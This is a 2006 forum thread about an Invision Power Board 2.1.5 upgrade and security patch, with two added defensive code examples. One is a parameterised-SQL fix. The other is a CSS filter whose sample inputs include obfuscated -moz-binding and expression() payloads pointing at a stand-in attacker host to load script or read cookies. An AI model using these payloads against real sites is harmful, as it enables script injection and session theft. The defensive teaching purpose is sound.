bfarber Posted March 8, 2006 I'm not sure what you mean? I just downloaded the new security patch (which, before anyone asks, addresses *different* issues, not the one from the link to securityadvisory) and I downloaded the updated copy of 2.1.5, which is patched. You're not seeing the patch itself in the client center? Click on the link to download another version, and it should be listed on that page. Was for me. :blink:
princetontiger Posted March 8, 2006 I see the security patch under 'other downloads'. Thanks Brandon. :) If you're not logged in, it appears that the download page still shows.. you just can't download anything.
Logan Posted March 8, 2006 Thanks for the patch. Wow, there are a lot of patches listed in the client center; I almost downloaded the wrong one. Maybe it's time to clean out all the old ones? BTW: There are no changes in calendar.php even though it's in the patch :S
AtariAge Posted March 8, 2006 I clicked the "download page" link in the security patch announcement, and then clicked "Download >>" and received the following error: mySQL query error: SELECT * FROM download_packages WHERE download_id= AND download_allow LIKE '%,2,%' SQL error: SQL error code: Date: Wednesday 08th of March 2006 10:11:16 AM Edit: I was able to download the patch manually by logging into the client center and following the chain of links to get to the patch. ..Al
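The error above shows a query that reads `WHERE download_id= AND ...`: the id arrived empty and was spliced into the SQL text, so the database saw a syntax error instead of a value. The following is an added example, not the client-center code (which the page does not show); it reproduces that failure against an in-memory SQLite table and sets a validated, parameterised query beside it. The table and column names and the `',2,'` matching pattern are taken from the error message; the rows, the `name` column and the `download_id` validation rule are assumptions constructed for the example.

```python
import re
import sqlite3

# Constructed rows. Table and column names come from the error message on the
# page; the contents are made up for this example.
SAMPLE_ROWS = [
    (1, "IPB 2.1.5 full package", ",1,2,"),
    (2, "Security patch for 2.1.x", ",2,"),
    (3, "Converters", ",1,"),
]


def make_db() -> sqlite3.Connection:
    """Throwaway in-memory database standing in for the client-center table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE download_packages "
        "(download_id INTEGER PRIMARY KEY, name TEXT, download_allow TEXT)"
    )
    conn.executemany("INSERT INTO download_packages VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def naive_query(conn, raw_id: str, group_id: int):
    """String-built query of the shape the error message shows. An empty
    raw_id yields 'WHERE download_id= AND ...', a syntax error, and any other
    non-numeric value is parsed as SQL just the same."""
    sql = (
        "SELECT * FROM download_packages WHERE download_id=" + raw_id
        + " AND download_allow LIKE '%," + str(group_id) + ",%'"
    )
    return conn.execute(sql).fetchall()


# Assumed validation rule: a download id is a positive decimal integer.
ID_RE = re.compile(r"[1-9][0-9]*")


def safe_query(conn, raw_id: str, group_id: int):
    """Hardened version: validate before the database sees the value, then
    bind it as a parameter instead of splicing it into the SQL text."""
    if not ID_RE.fullmatch(raw_id):
        raise ValueError(f"invalid download_id: {raw_id!r}")
    sql = (
        "SELECT download_id, name FROM download_packages "
        "WHERE download_id = ? AND download_allow LIKE ?"
    )
    # Keep the commas on both sides so group 2 does not match ',12,' or ',21,'.
    return conn.execute(sql, (int(raw_id), f"%,{group_id},%")).fetchall()


def naive_fails_on_empty_id() -> bool:
    """True when the concatenated query is rejected by the database for id ''."""
    try:
        naive_query(make_db(), "", 2)
    except sqlite3.OperationalError:
        return True
    return False


def safe_rejects_empty_id() -> bool:
    """True when the hardened version refuses id '' before issuing any SQL."""
    try:
        safe_query(make_db(), "", 2)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("naive query with empty id raises:", naive_fails_on_empty_id())
    print("safe query with empty id rejected:", safe_rejects_empty_id())
    print("safe query, id 2, group 2:", safe_query(db, "2", 2))
```

The validation step is what turns the blank-id case into a clear application error rather than a database error page, and parameter binding is what keeps every other non-numeric value out of the SQL parser.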
bfarber Posted March 8, 2006 @Logan, there was an SQL exploit in the calendar that *may* have been patched in the first release of 2.1.5. I thought it was reported after 2.1.5 was ready for release, but perhaps the patch had made it in before 2.1.5 was actually released initially?
marcele Posted March 8, 2006 I'm thinking that now would be a great time to have a THIRD PARTY security review of its products (say from Gulftech)? The IPB codebase is stable and there aren't going to be many changes for a while. While I understand that security updates are a fact of life, the frequency of these exploits is really starting to look bad. (Yes Brandon, the patch in calendar.php was included in 2.1.5) ..
Logan Posted March 8, 2006 I'm thinking that now would be a great time to have a THIRD PARTY security review of its products (say from Gulftech)? The IPB codebase is stable and there aren't going to be many changes for a while. While I understand that security updates are a fact of life, the frequency of these exploits is really starting to look bad. (Yes Brandon, the patch in calendar.php was included in 2.1.5) .. I very much agree!
bfarber Posted March 8, 2006 While I understand that security updates are a fact of life, the frequency of these exploits is really starting to look bad. I think that the bulk of the exploits have either been present since 1.x/2.x, and/or have been present in all versions of 2.1. They are just coming to light now, and rather than try to "save face" we'd rather release an update to address the issues as they are discovered. It's very probable that a few of the security exploits we recently patched are present in other online software, as some of them are not very widely known. Do some research on moz-binding for example... IPB is protected against this, but it is quite a scary thing. Anyways, I think the possibility of a third party security reviewer has been discussed in the past. I can't comment on its status or the result of the discussions however.
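The moz-binding issue mentioned above is the Firefox-era trick of putting `-moz-binding: url(...)` into user-controlled CSS so that the browser loads an XBL binding, which can carry script; a filter that only looks for the literal string misses the spellings attackers actually use. The following is an added example, not IPB's filter (the page says only that IPB is protected, not how): it normalises a style string the way a browser would before matching a small list of dangerous constructs. The token list, the sample styles and the `attacker.invalid` host are assumptions constructed for the example.

```python
import re

# Constructs that let a stylesheet run script in browsers of that era:
# -moz-binding (Firefox XBL), expression() and behavior: (Internet Explorer),
# and javascript: URLs. Assumed list; extend it for your own filter.
DANGEROUS_TOKENS = ("-moz-binding", "expression(", "behavior:", "javascript:")


def _unescape(match: re.Match) -> str:
    """Turn a CSS hex escape such as '\\6d ' into the character it encodes."""
    code = int(match.group(1), 16)
    return chr(code) if code <= 0x10FFFF else "\ufffd"


def normalize_css(css: str) -> str:
    """Undo the tricks a plain substring check would miss: CSS comments
    ('-moz-/**/binding'), backslash hex escapes ('\\6d oz-binding' spells
    'moz-binding'), single-character escapes, and whitespace or control
    characters scattered inside a token."""
    css = re.sub(r"/\*.*?\*/", "", css, flags=re.S)               # comments
    css = re.sub(r"\\([0-9a-fA-F]{1,6})\s?", _unescape, css)      # \6d -> m
    css = re.sub(r"\\(.)", r"\1", css, flags=re.S)                # \x -> x
    css = re.sub(r"[\s\x00-\x1f]+", "", css)                      # whitespace
    return css.lower()


def find_dangerous_css(css: str) -> list:
    """Entries of DANGEROUS_TOKENS present after normalisation. The filter
    errs toward rejecting: it also flags spellings a browser would not honour,
    which is the right failure mode for user-supplied styles."""
    text = normalize_css(css)
    return [token for token in DANGEROUS_TOKENS if token in text]


def is_safe_style(css: str) -> bool:
    return not find_dangerous_css(css)


# Constructed samples: one benign style and several obfuscated hostile ones.
SAMPLES = {
    "benign": "color: red; width: 100px",
    "plain": "-moz-binding: url(http://attacker.invalid/xbl.xml#x)",
    "comment": "-moz-/**/binding:url(http://attacker.invalid/xbl.xml#x)",
    "hex_escape": "-\\6d oz-bind\\69 ng: url(http://attacker.invalid/xbl.xml#x)",
    "ie_expression": "width: expr\\65 ssion(alert(document.cookie))",
}

if __name__ == "__main__":
    for label, style in SAMPLES.items():
        print(f"{label:14s} -> {find_dangerous_css(style) or 'clean'}")
```

A denylist like this is only as good as its normalisation; the safer design for user CSS is an allowlist of properties and value grammars, with the normalisation step applied before the allowlist check.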
marcele Posted March 8, 2006 I think that the bulk of the exploits have either been present since 1.x/2.x, and/or have been present in all versions of 2.1. They are just coming to light now, and rather than try to "save face" we'd rather release an update to address the issues as they are discovered. Anyways, I think the possibility of a third party security reviewer has been discussed in the past. I can't comment on its status or the result of the discussions however. Yes, I've talked to Matt about it and he said that it's something that IPS might look into (that was some time ago). That's why it would be great to get "another person's eyes" going through all the code. Gulftech really knows their stuff (finding little-known exploits in a ton of different PHP software). I think that it would really inspire confidence in your customers that not only are you willing to patch your software quickly when exploits are found (like every other forum software vendor) but that you are "pro-actively" trying to find them before they are even public. I think it's just another way that IPS could jump above the competition.
Invisionary Posted March 8, 2006 In lang_search.php 'nav_au' appears twice. Once as "All posts by a member" and once as "Active Topics". Generally speaking, I don't know what I'm talking about, but won't that cause a conflict? I mean... how does the software know which line of text to display? :huh: EDIT: And lang_ucp.php still has the place names Colombo and Dhaka as Colomba and Dhakra. That is old, guys!
Strike X Posted March 8, 2006 WOW! Looks like a lot of people are having problems with IPB 2.1.5.. I'm not gonna upgrade it, I'll wait till IPB 2.1.6
Michael P Posted March 8, 2006 My license for one forum expired a few days before this patch - am I allowed to apply the security patch to my forum? I agree - an external security code review is needed. IPS became a commercial / customer orientated company - playing with the big boys now (I mean with respect to software and Internet software, not just other forums) so they need to be more professional about security. Security updates are good - but they should not be as frequent - something which a security audit could solve.
bfarber Posted March 8, 2006 WOW! Looks like a lot of people are having problems with IPB 2.1.5.. I'm not gonna upgrade it, I'll wait till IPB 2.1.6 Seriously? :huh: There really aren't any/many problems here..... Anyways, the next planned release will be 2.2, not 2.1.6 :) @marcele... it's funny. I've actually brought up this suggestion with my supervisors as well. :) Anyways, it is a decision management has to weigh and finally draw a conclusion as to whether the cost-benefit is worth it. Note: the moz-binding issue I mentioned earlier has not, to date, been exploited as far as we know. It was a fix made proactively. :) I do see where you are going though. ;) @Invisionary, if that is the case, the only "side effect" is that the text that appears later in the file will be shown. I'd recommend submitting it to the bug tracker just so it's not overlooked in the next release, but really, that's quite minor. :)
Invisionary Posted March 8, 2006 @Invisionary, if that is the case, the only "side effect" is that the text that appears later in the file will be shown. I'd recommend submitting it to the bug tracker just so it's not overlooked in the next release, but really, that's quite minor. :) I told you I didn't know what I was talking about :) So, to clarify, the second line ("Active Topics") will be displayed each time 'nav_au' is called? If that's the case I need to find every call to it and check it doesn't really need to display the first line ("All posts by a member"), as one could look out of place when replacing the other... I think :blink:
Mesmer Posted March 8, 2006 WOW! Looks like a lot of people are having problems with IPB 2.1.5.. I'm not gonna upgrade it, I'll wait till IPB 2.1.6 Most of those people have problems because they have mods installed. This group often has problems when they upgrade/update their board. I upgraded with no problems whatsoever.
Winnie the Pooh Posted March 8, 2006 bfarber, could you be so kind and publish here the manual bugfix for 2.1.5? Thx
.John. Posted March 8, 2006 Manual edits can be found here: http://www.ipsbeyond.com/forums/index.php?showtopic=4240 :)
bfarber Posted March 8, 2006 Hello, We do not have instructions for manually patching IPB to get it to 2.1.5..... // Edit, ah, I see, manual edits for the security patch. Confusing discussing both in one topic. :blink: @Invisionary, well, it's a bug, and it isn't at the same time. It has an undesired effect (I'm guessing at least) but won't cause any problems with the script execution (i.e. errors). :)
Spirix Posted March 8, 2006 Thanks for the 2.1.5 upgrade, and the security patch. Everything went extremely well except for some MySQL thing that was running twice. But that was not IPB's fault but from some mod. Personally, I do not mind security patches because they really are the easiest thing to install/patch. Even if IPS releases 5 a week I wouldn't care, as long as I know they are actively trying to fix the software. Good job to bfarber and team! :D
zwelch82 Posted March 8, 2006 @bfarber: the feature "Remove incomplete registration validations after [x] days" does not work...... it does not remove the unvalidated accounts. :( What can I do?
Lindy (Management) Posted March 8, 2006 I'm thinking that now would be a great time to have a THIRD PARTY security review of its products (say from Gulftech)? The IPB codebase is stable and there aren't going to be many changes for a while. While I understand that security updates are a fact of life, the frequency of these exploits is really starting to look bad. (Yes Brandon, the patch in calendar.php was included in 2.1.5) .. We agree that it's a great idea - an extra set of eyes never hurts. I've been in talks with a couple of security auditing firms and we are going to shoot for an audit of 2.2. :)
Philip_B Posted March 9, 2006 Just a quick question: where can I find the code that uses the 'iframe.html' that is being used to fix the IE bug?